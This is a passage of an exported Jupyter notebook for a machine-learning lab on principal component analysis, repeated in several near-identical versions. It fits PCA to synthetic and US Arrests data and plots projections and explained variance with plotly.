specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
print(X.shape)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=scene, scene2=scene, scene_aspectmode="cube",
scene_xaxis_title="x", scene2_xaxis_title="x",
scene_yaxis_title="y", scene2_yaxis_title="y",
scene_zaxis_title="z", scene2_zaxis_title="z")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
